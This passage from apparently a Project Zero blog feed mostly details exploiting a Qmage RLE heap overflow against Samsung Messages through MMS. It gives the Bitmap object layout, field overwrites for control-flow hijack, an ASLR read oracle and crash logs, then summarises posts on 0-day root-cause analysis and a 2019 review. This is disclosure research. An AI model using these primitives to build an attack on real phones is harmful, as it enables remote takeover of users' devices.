    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[15699] malloc(160) => 0x7b88feb960
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe582608

The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.

It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their volume surely doesn't sum up to 160 bytes. This is because the code makes heavy use of C++ inheritance, so android::Bitmap inherits from SkPixelRefSkRefCntSkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:

struct android::Bitmap {

  /* +0x00 */ void *vtable;

  //
  // class SK_API SkRefCntBase
  //

  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;

  //
  // class SK_API SkPixelRef : public SkRefCnt
  //

  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;

  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;

  struct /* SkIDChangeListener::List */ {
  /* +0x30 */ std::atomic<int> fCount;
  /* +0x34 */ SkOnce           fOSSemaphoreOnce;
  /* +0x38 */ OSSemaphore*     fOSSemaphore;
  } fGenIDChangeListeners;

  struct /* SkTDArray<SkIDChangeListener*> */ {
  /* +0x40 */ SkIDChangeListener* fArray;
  /* +0x48 */ int                 fReserve;
  /* +0x4C */ int                 fCount;
  } fListeners;

  /* +0x50 */ std::atomic<bool> fAddedToCache;

  /* +0x51 */ enum Mutability {
  /* +0x51 */   kMutable,
  /* +0x51 */   kTemporarilyImmutable,
  /* +0x51 */   kImmutable,
  /* +0x51 */ } fMutability : 8;

  //
  // class ANDROID_API Bitmap : public SkPixelRef
  //

  struct /* SkImageInfo */ {
  /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;
  /* +0x60 */ int fWidth;
  /* +0x64 */ int fHeight;
  /* +0x68 */ SkColorType fColorType;
  /* +0x6C */ SkAlphaType fAlphaType;
  } mInfo;

  /* +0x70 */ const PixelStorageType mPixelStorageType;
  /* +0x74 */ BitmapPalette mPalette;
  /* +0x78 */ uint32_t mPaletteGenerationId;
  /* +0x7C */ bool mHasHardwareMipMap;

  union {
    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ int fd;
  /* +0x90 */ size_t size;
    } ashmem;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
    } heap;

    struct {
  /* +0x80 */ GraphicBuffer* buffer;
    } hardware;
  } mPixelStorage;

  /* +0x98 */ sk_sp<SkImage> mImage;
};

We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.

Building code execution primitives

In order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm sources file that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is what I also used here, to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and reverse engineering the codec in libhwui.so. This is where the debug symbols from old builds of libQmageDecoder.so I dug up earlier in the recon phase (as discussed in Part 1) proved very useful.

The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:

  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • A RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:

00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH
00000010: aa aa                                            ..

The little-endian 0x0000000E value indicates the length of the overall compressed stream, 0x00000008 specifies the number of runs – in this case, length of the decompressed data, then there is the raw data and finally N÷4 bytes 0xAA, each of which signifies four runs, one-byte each. With that out of the way, we can proceed to testing potential code execution primitives.

The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 24624, tid: 24642, name: ReferenceQueueD  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151
    x0  0000007c2ac85e40  x1  0000007c25ae9724
    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0
    x4  000000006f2693ac  x5  0000007c25ae96e4
    x6  0000000000000001  x7  0000000000000000
    x8  4141414141414141  x9  0000000000000000
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000000000360168  x13 0000000000004000
    x14 0000000000000004  x15 0000000000000000
    x16 0000007c25ae9710  x17 0000000000000bc3
    x18 0000007bd31ee000  x19 0000007c2ad2d9c0
    x20 0000007c3034ff80  x21 0000000013126208
    x22 0000000013126208  x23 00000000131261a0
    x24 000000006f26bb50  x25 00000000131261e0
    x26 0000007cc0350cb0  x27 0000007c3a3f5000
    x28 0000007c25aea020  x29 0000007c25ae9700
    sp  0000007c25ae96f0  lr  00000000705bdc44
    pc  0000007cbd81f210

backtrace:
      #00 pc 0000000000186210  /system/lib64/libandroid_runtime.so (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)
[...]

There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:

.text:0000000000186210                 LDR             X8, [X8,#0x10]
.text:0000000000186214                 BLR             X8

As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is controlled by the value of the consecutive fRefCnt field, so we may choose to trigger it or not by setting the reference counter to a small or large integer.

The second eye-catching field that can be likely abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

We can check where the pointer is used by running a quick cs.android.com search. As it turns out, it is called in the Bitmap::~Bitmap destructor:

236:       case PixelStorageType::External:
237:            mPixelStorage.external.freeFunc(mPixelStorage.external.address,
238:                                            mPixelStorage.external.context);
239:            break;

If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.

The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the libhwui.so base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.

To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment:

  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to 0xaaaa...aaa.
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.

If we send it via MMS, we should see the following crash in logcat:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12954, tid: 13700, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc
    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb
    x2  0000000000000001  x3  0000000000000000
    x4  0000007c2be315d0  x5  0000007c3910cc64
    x6  0000000000000000  x7  00000000186f2b72
    x8  cccccccccccccccc  x9  0000007cbbdfc4f0
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000007c3175b20c  x13 000000005f0cc80f
    x14 003419f64036d144  x15 000051761dd7a34a
    x16 0000007cbd8f3230  x17 0000007cbba98620
    x18 0000007bbc84e000  x19 0000007bc8ff8dc0
    x20 0000000000000000  x21 0000007bc9153540
    x22 000000000000000c  x23 0000000000000000
    x24 0000000000000000  x25 0000000000000002
    x26 0000007c2be32d50  x27 0000000000000059
    x28 0000007cc03fa7c0  x29 0000007c2be319c0
    sp  0000007c2be319b0  lr  0000007cbba69f00
    pc  cccccccccccccccc

backtrace:
      #00 pc cccccccccccccccc  <unknown>
      #01 pc 0000000000437efc  /system/lib64/libhwui.so (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).

In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the libhwui.so location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.

Building an ASLR oracle primitive

In most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.

The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting an iPhone iMessage CVE-2019-8641 vulnerability in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.

The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.

The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.

Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 000000000047a760  /system/lib64/libhwui.so (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)
      #01 pc 000000000018df90  /system/lib64/libandroid_runtime.so (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)
      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)
      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.getColorSpace+76)
      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createBitmap+880)
      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createScaledBitmap+372)

The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:

Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12550, tid: 12666, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant
  at void android.graphics.ColorSpace$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (ColorSpace.java:2264)
  at android.graphics.ColorSpace android.graphics.Bitmap.nativeComputeColorSpace(long) (Bitmap.java:-2)
  at android.graphics.ColorSpace android.graphics.Bitmap.getColorSpace() (Bitmap.java:2091)

Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters method. This means that that pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zero'ed memory in the ASLR oracle output.

The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:

android.graphics.ColorSpace$Rgb$TransferParameters.<init>
android.graphics.Bitmap.nativeComputeColorSpace
android.graphics.Bitmap.getColorSpace
android.graphics.Bitmap.createBitmap
android.graphics.Bitmap.createScaledBitmap
com.samsung.android.messaging.common.util.ImageUtil.scaleToHeight
com.samsung.android.messaging.common.util.ImageUtil.scaleToWidth
com.samsung.android.messaging.common.util.ImageUtil.loadBitmapFromStream
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.ui.model.l.at.a
[...]

We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the ui.model.l.at.a method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.

Lifetime of a Bitmap

When we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:

  1. The initial Bitmap is created through BitmapFactory.decodeStream call   ImageUtil.loadBitmapFromStream:

    Initial BitmapFactory.decodeStream call

  2. The bitmap is then subjected to scaling:

    Scaling the bitmap to width

  3. The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones:

    Decompiled scaleToWidth function

  4. Lastly, in the com.samsung.android.messaging.ui.model.l.at.a method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding:

    Loading and converting the bitmap in Samsung Messages code

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.

I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes 0x41 again, we should adjust:

  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:

  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the rowBytes checks (1, 2) in SkBitmap::setInfo by setting it to a sensible value:

  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:

  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic under android.graphics.Bitmap.copyBitmap_copybitmapCopyToSkPixmap::readPixelsSkConvertPixelsswizzle_or_premul. To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:

  • mInfo.fColorType (offset 0x68) → 0x6

Finally, we arrive at the following loop:

62:    for (int y = 0; y < dstInfo.height(); y++) {
63:        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());
64:        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);
65:        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);
66:    }

That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:

  • dstInfo.height() == mInfo.height
  • dstInfo.width() == mInfo.width
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:


This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:

  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, in mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary continuous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.

As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 00000000006fb210  /system/lib64/libhwui.so (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)
      #01 pc 00000000003b5410  /system/lib64/libhwui.so (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)
      #02 pc 00000000003b5114  /system/lib64/libhwui.so (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)
      #03 pc 00000000004f26c0  /system/lib64/libhwui.so (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)
      #04 pc 0000000000185fb8  /system/lib64/libandroid_runtime.so (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)
      #05 pc 000000000018397c  /system/lib64/libandroid_runtime.so (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)
[...]

A sigsegv is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the com.samsung.android.messaging process is a stack:

7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]

To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)

The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.

Summary

To recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.

The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of libhwui.so. Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regards to low-level exploitation capabilities.

With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:

  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.

Root Cause Analyses for 0-day In-the-Wild Exploits

29 July 2020 at 17:27
By: Tim

Posted by Maddie Stone, Project Zero


When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 

We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.


For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 

When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.

Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative 🙂 ). In addition, we’re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.


These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 

Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions and we hope that others will also begin publishing information from the RCA template in the future.

Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019

29 July 2020 at 17:27
By: Tim
Posted by Maddie Stone, Project Zero

In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019. 

When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected. 

The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.

The Basics

In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here.  This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. 

Line graph showing 0-days detected in the wild by year with a bitmoji of Maddie scratching her head and the thought bubble saying "What aren't we detecting?". The line graph has the following values: 2014 - 22, 2015 - 28, 2016 - 25, 2017 - 22, 2018 - 12, 2019 - 20.


The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.

All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here

0-days by Vendor

One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. 

While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.

Bar graph of number of 0-days by vendor (Apple, Facebook, Google, Microsoft, Mozilla, and Trend Micro) with a Bitmoji of Maddie and a thinking face and the comment "Things aren't how they appear..."


Microsoft Deep-Dive

For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for. 

Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. 

